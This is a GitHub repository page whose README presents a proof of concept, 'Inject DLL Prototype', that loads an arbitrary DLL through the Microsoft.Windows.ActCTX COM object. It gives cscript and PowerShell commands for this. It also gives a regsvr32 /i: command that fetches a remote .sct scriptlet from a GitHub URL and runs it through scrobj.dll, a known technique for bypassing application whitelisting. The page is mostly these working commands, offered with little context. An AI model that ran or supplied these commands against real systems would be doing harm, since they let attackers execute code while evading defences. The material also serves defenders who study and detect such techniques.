Skip to content

api0cradle/RegistrationFreeCOM

 
 

Repository files navigation

RegistrationFreeCOM

Inject DLL Prototype using Microsoft.Windows.ACTCTX COM Object

Extract Files to C:\Tools\regfree

CScript Example:

C:\Windows\syswow64\cscript.exe regfree.js

PowerShell Example: Be Sure to Use x86 PowwerShell for my POC

$a = New-Object -COM Microsoft.Windows.ActCTX

$a.Manifest = "C:\Tools\regfree\SideBySide.X.manifest"

$a.CreateObject("SideBySide.X")

The DLL can be any dll you create with code in DLL_PROCESS_ATTACH

This may be useful. I don't know. I think its interesting.

For DynamicWrapperX example:

C:\Windows\syswow64\regsvr32.exe

/s /u /i:https://raw.githubusercontent.com/subTee/RegistrationFreeCOM/master/dynamicwrapper.sct scrobj.dll

About

Inject DLL Prototype using Microsoft.Windows.ACTCTX COM Object

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published